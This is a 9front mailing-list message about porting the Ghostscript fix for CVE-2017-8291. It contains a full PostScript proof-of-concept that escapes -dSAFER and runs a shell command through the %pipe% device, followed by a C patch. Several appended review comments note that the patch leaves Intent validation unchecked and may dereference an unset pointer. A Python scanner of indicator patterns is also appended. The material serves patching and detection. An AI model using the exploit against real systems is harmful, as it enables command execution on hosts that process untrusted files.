From mboxrd@z Thu Jan 1 00:00:00 1970
Received: from mail-pg1-f179.google.com ([209.85.215.179]) by ewsd; Fri Jun 21 06:53:33 EDT 2019
From: Jacob Moody
Date: Fri, 21 Jun 2019 05:53:16 -0500
Message-ID:
Subject: [9front] ghostscript: Mitigations against CVE-2017-8291
To: 9front@9front.org
Content-Type: text/plain; charset="UTF-8"
List-ID: <9front.9front.org>
List-Help:
X-Glyph: ➈
X-Bullshit: shared session blockchain-aware rails

All,

Grabbed the upstream changes for the mitigation against CVE-2017-8291.
The proofs of concept I found online do not seem to do anything interesting
besides hang gs indefinitely or suicide.

To reproduce:

gs -q -dNOPAUSE -dSAFER '-sDEVICE=ppmraw' '-sOutputFile=/dev/null' <<.
%!PS-Adobe-3.0 EPSF-3.0
%%BoundingBox: -0 -0 100 100

/size_from 10000 def
/size_step 500 def
/size_to 65000 def
/enlarge 1000 def

%/bigarr 65000 array def

0
size_from size_step size_to {
	pop
	1 add
} for

/buffercount exch def

/buffersizes buffercount array def

0
size_from size_step size_to {
	buffersizes exch 2 index exch put
	1 add
} for

pop

/buffers buffercount array def

0 1 buffercount 1 sub {
	/ind exch def
	buffersizes ind get /cursize exch def
	cursize string /curbuf exch def
	buffers ind curbuf put
	cursize 16 sub 1 cursize 1 sub {
		curbuf exch 255 put
	} for
} for

/buffersearchvars [0 0 0 0 0] def
/sdevice [0] def

enlarge array aload
{
	.eqproc
	buffersearchvars 0 buffersearchvars 0 get 1 add put
	buffersearchvars 1 0 put
	buffersearchvars 2 0 put
	buffercount {
		buffers buffersearchvars 1 get get
		buffersizes buffersearchvars 1 get get
		16 sub get
		254 le {
			buffersearchvars 2 1 put
			buffersearchvars 3 buffers buffersearchvars 1 get get put
			buffersearchvars 4 buffersizes buffersearchvars 1 get get 16 sub put
		} if
		buffersearchvars 1 buffersearchvars 1 get 1 add put
	} repeat
	buffersearchvars 2 get 1 ge {
		exit
	} if
	%(.) print
} loop

.eqproc
.eqproc
.eqproc
sdevice 0
currentdevice
buffersearchvars 3 get buffersearchvars 4 get 16#7e put
buffersearchvars 3 get buffersearchvars 4 get 1 add 16#12 put
buffersearchvars 3 get buffersearchvars 4 get 5 add 16#ff put
put

buffersearchvars 0 get array aload

sdevice 0 get 16#3e8 0 put
sdevice 0 get 16#3b0 0 put
sdevice 0 get 16#3f0 0 put

currentdevice null false mark /OutputFile (%pipe%echo gotce)
.putdeviceparams
1 true .outputpage
.rsdparams
%{ } loop
0 0 .quit
%asdf
.

Patch:

diff -r 986e26228cfe sys/src/cmd/gs/src/zfrsd.c --- a/sys/src/cmd/gs/src/zfrsd.c Thu May 23 14:59:28 2019 +0200 +++ b/sys/src/cmd/gs/src/zfrsd.c Fri Jun 21 05:34:42 2019 -0500 @@ -47,13 +47,19 @@ ref *pFilter; ref *pDecodeParms; int Intent; - bool AsyncRead; + bool AsyncRead = false; ref empty_array, filter1_array, parms1_array; uint i; - int code; + int code = 0; + + if (ref_stack_count(&o_stack) < 1) + return_error(e_stackunderflow); + if (!r_has_type(op, t_dictionary) && !r_has_type(op, t_null)) + return_error(e_typecheck); make_empty_array(&empty_array, a_readonly); - if (dict_find_string(op, "Filter", &pFilter) > 0) { + if (r_has_type(op, t_dictionary) + && dict_find_string(op, "Filter", &pFilter) > 0) { if (!r_is_array(pFilter)) { if (!r_has_type(pFilter, t_name)) return_error(e_typecheck); @@ -92,10 +98,12 @@ return_error(e_typecheck); } } - if ((code = dict_int_param(op, "Intent", 0, 3, 0, &Intent)) < 0 || - (code = dict_bool_param(op, "AsyncRead", false, &AsyncRead)) < 0 - ) - return code; + if (r_has_type(op, t_dictionary)) + code = dict_int_param(op, "Intent", 0, 3, 0, &Intent); + + if (r_has_type(op, t_dictionary)) + if ((code = dict_bool_param(op, "AsyncRead", false, &AsyncRead)) < 0) + return code; push(1); op[-1] = *pFilter; if (pDecodeParms) diff -r 986e26228cfe sys/src/cmd/gs/src/zmisc3.c --- a/sys/src/cmd/gs/src/zmisc3.c Thu May 23 14:59:28 2019 +0200 +++ b/sys/src/cmd/gs/src/zmisc3.c Fri Jun 21 05:34:42 2019 -0500 
@@ -55,6 +55,12 @@ ref2_t stack[MAX_DEPTH + 1]; ref2_t *top = stack; + if (ref_stack_count(&o_stack) < 2) + return_error(e_stackunderflow); + if (!r_is_array(op - 1) || !r_is_array(op)) { + return_error(e_typecheck); + } + make_array(&stack[0].proc1, 0, 1, op - 1); make_array(&stack[0].proc2, 0, 1, op); for (;;) { Thanks, moody
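Review bot: in the @@ -47,13 +47,19 @@ hunk of zfrsd.c, pFilter is now only assigned inside the new `r_has_type(op, t_dictionary) && dict_find_string(op, "Filter", &pFilter) > 0` branch, while the second hunk still dereferences it unconditionally with `op[-1] = *pFilter;`. Since the new typecheck deliberately admits a t_null operand, confirm that the else branch outside this hunk points pFilter at a valid ref (for example the empty_array this hunk already builds) so the null case cannot reach that dereference through an unset pointer.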
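Review bot: in the @@ -92,10 +98,12 @@ hunk of zfrsd.c, the result of `code = dict_int_param(op, "Intent", 0, 3, 0, &Intent);` is stored but never tested, whereas the removed lines returned on `< 0`; an out-of-range or wrongly typed Intent now falls through, and code is then overwritten by the AsyncRead call. Add `if (code < 0) return code;` between the two checks so the Intent validation still fails closed, and consider merging the two identical `if (r_has_type(op, t_dictionary))` guards into one block.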
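Review bot: in the @@ -55,6 +55,12 @@ hunk of zmisc3.c, the brace style is inconsistent: the `ref_stack_count(&o_stack) < 2` check omits braces while the array typecheck wraps its single `return_error(e_typecheck);` in them; match the surrounding gs style and drop the braces. The ordering itself is right, both operands are validated before make_array reads op - 1 and op.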
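As an added example (not part of moody's message and not code from the 9front or Ghostscript trees), the script below scans a PostScript file for the indicators the proof of concept above relies on: a `%pipe%` device string, `/OutputFile` being rewritten via `.putdeviceparams`, and use of the internal `.eqproc` and `.rsdparams` operators that the patch hardens. The indicator list and both sample documents are constructed for this example; `%` comments are stripped before matching so a commented-out mention does not fire, while `%` inside a `(...)` string, where the PoC actually places `%pipe%`, is kept.

```python
import re

# Constructed indicator list, taken from what the PoC in this message does.
INDICATORS = {
    "pipe_device": re.compile(r"%pipe%", re.IGNORECASE),
    "outputfile_param": re.compile(r"/OutputFile\b"),
    "putdeviceparams": re.compile(r"(?<![A-Za-z0-9])\.putdeviceparams\b"),
    "internal_eqproc": re.compile(r"(?<![A-Za-z0-9])\.eqproc\b"),
    "internal_rsdparams": re.compile(r"(?<![A-Za-z0-9])\.rsdparams\b"),
}


def strip_comments(line):
    """Drop a PostScript % comment, but leave % inside (...) strings alone."""
    depth = 0  # nesting depth of (...) string literals
    i = 0
    while i < len(line):
        c = line[i]
        if c == "\\" and depth > 0:
            i += 2  # escaped character inside a string
            continue
        if c == "(":
            depth += 1
        elif c == ")" and depth > 0:
            depth -= 1
        elif c == "%" and depth == 0:
            return line[:i]
        i += 1
    return line


def scan_postscript(text):
    """Return {indicator_name: [line numbers]} for every indicator that fires."""
    hits = {}
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = strip_comments(raw)
        for name, pat in INDICATORS.items():
            if pat.search(line):
                hits.setdefault(name, []).append(lineno)
    return hits


def is_suspicious(text):
    """Flag a document that tries to reach %pipe%, rewrites OutputFile through
    .putdeviceparams, or calls the internal .rsdparams operator."""
    hits = scan_postscript(text)
    return (
        "pipe_device" in hits
        or ("outputfile_param" in hits and "putdeviceparams" in hits)
        or "internal_rsdparams" in hits
    )


# Constructed sample: the tail of the PoC from this message, trimmed.
SAMPLE_MALICIOUS = """%!PS-Adobe-3.0 EPSF-3.0
/buffersearchvars [0 0 0 0 0] def
.eqproc
currentdevice null false mark /OutputFile (%pipe%echo gotce)
.putdeviceparams
1 true .outputpage
.rsdparams
%{ } loop
0 0 .quit
"""

# Constructed sample: ordinary page output; the % signs here are harmless.
SAMPLE_BENIGN = """%!PS
% the %pipe% device is not used by this document
/Helvetica findfont 12 scalefont setfont
72 72 moveto (50% off) show
showpage
"""

if __name__ == "__main__":
    for label, doc in (("poc", SAMPLE_MALICIOUS), ("benign", SAMPLE_BENIGN)):
        print(label, is_suspicious(doc), scan_postscript(doc))
```

Run it against a directory of incoming PostScript or EPS files before they reach gs; a hit on `pipe_device` or `internal_rsdparams` is worth quarantining regardless of whether -dSAFER is in effect.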